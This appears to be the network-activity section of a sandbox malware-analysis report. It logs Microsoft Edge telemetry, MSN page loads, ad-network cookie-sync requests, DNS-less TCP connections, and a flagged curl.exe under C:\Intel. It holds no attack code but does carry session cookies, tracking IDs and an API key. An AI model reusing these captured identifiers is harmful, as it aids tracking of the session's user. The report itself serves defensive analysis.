    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578515356&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 10698sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578518356&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 10413sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578521342&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 10329sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: OPTIONS /api/report?cat=msn HTTP/1.1Host: deff.nelreports.netConnection: keep-aliveOrigin: https://assets.msn.comAccess-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: unknownTCP traffic detected without corresponding DNS query: 23.213.53.9
    Source: unknownTCP traffic detected without corresponding DNS query: 172.217.0.163
    Source: unknownTCP traffic detected without corresponding DNS query: 172.217.0.163
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: C:\Intel\curl.exeCode function: 34_2_001D3D70 recv,WSAGetLastError,34_2_001D3D70
    Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531&firstlaunch=1 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.489618fee28203b75117.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Device-Memory: 8Origin: https://ntp.msn.comsec-ch-ua-model: rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "94.0.992.31"sec-ch-ua-platform-version: "10.0.0"downlink: 1.5sec-ch-ua-bitness: "64"ect: 4gsec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531&firstlaunch=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_ETH=1; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; MUIDB=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1
    Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.059504d3b28965aa7c6d.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Device-Memory: 8sec-ch-ua-model: rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "94.0.992.31"sec-ch-ua-platform-version: "10.0.0"downlink: 1.5sec-ch-ua-bitness: "64"ect: 4gsec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531&firstlaunch=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_ETH=1; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; MUIDB=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1
    Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.80e71276f1bec5cb9e6b.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.645cb4eb2f9e0802adfb.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.639a3a8baab8493c4920.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736578471573&udc=true&pg.n=FRE&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26firstlaunch%3D1&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=f7b66e0f99774ee4994a9572d133a3c9&activityId=f7b66e0f99774ee4994a9572d133a3c9&d.imd=false&scr=1024x768&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_ETH=1; USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1
    Source: global trafficHTTP traffic detected: GET /b?rn=1736578471573&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26firstlaunch%3D1%26content%3D1%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0136911D054E6BFC0E90846C04216AB7&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /b2?rn=1736578471573&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26firstlaunch%3D1%26content%3D1%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0136911D054E6BFC0E90846C04216AB7&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: UID=15091701be8ac68bbcb80111736578472
    Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736578471573&udc=true&pg.n=FRE&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26firstlaunch%3D1&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=f7b66e0f99774ee4994a9572d133a3c9&activityId=f7b66e0f99774ee4994a9572d133a3c9&d.imd=false&scr=1024x768&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=1FE748FF748B4324A916C66DF435B563&MUID=0136911D054E6BFC0E90846C04216AB7 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; SM=T
    Source: global trafficHTTP traffic detected: GET /sg/msn/1/cm?taboola_hm=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1Host: trc.taboola.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /uidmappixel?ext_uid=0136911D054E6BFC0E90846C04216AB7&pname=MSN&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.outbrain.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /setuid?partner=microsoftSsp&dbredirect=true&dnt=0&gdpr=0&gdpr_consent= HTTP/1.1Host: px.ads.linkedin.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cksync.php?type=nms&cs=3&ovsid=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1Host: hbx.media.netConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /m?cdsp=516415&c=0136911D054E6BFC0E90846C04216AB7&mode=inverse&msn_src=ntp&&gdpr=0&gdpr_consent= HTTP/1.1Host: cm.mgid.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sync/msn?gdpr=0&gdpr_consent= HTTP/1.1Host: pr-bh.ybp.yahoo.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /mapuid?suid=0136911D054E6BFC0E90846C04216AB7&sid=16&gdpr=0&gdpr_consent= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /visitor/sync?uid=9871605be8d4b2a982914bf5c9348e7b&name=MSN&visitor=0136911D054E6BFC0E90846C04216AB7&external=true&gdpr=0&gdpr_consent= HTTP/1.1Host: visitor.omnitagjs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cs/msn?id=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1Host: trace.mediago.ioConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /oRTB?redirect={PubRedirectUrl}&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=resriver&i=1&p=edgechrntp&l=en-us&d=bing&b=Edg&a=cae0bcac-0788-4314-8d6d-ef1f6cde9e84&ii=1&c=2556969255498558843&bid=af84565f-f8a6-4f2f-a974-1cccfb0c3669&tid=edgechrntp-resriver-1&ptid=edgechrntp-resriver-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
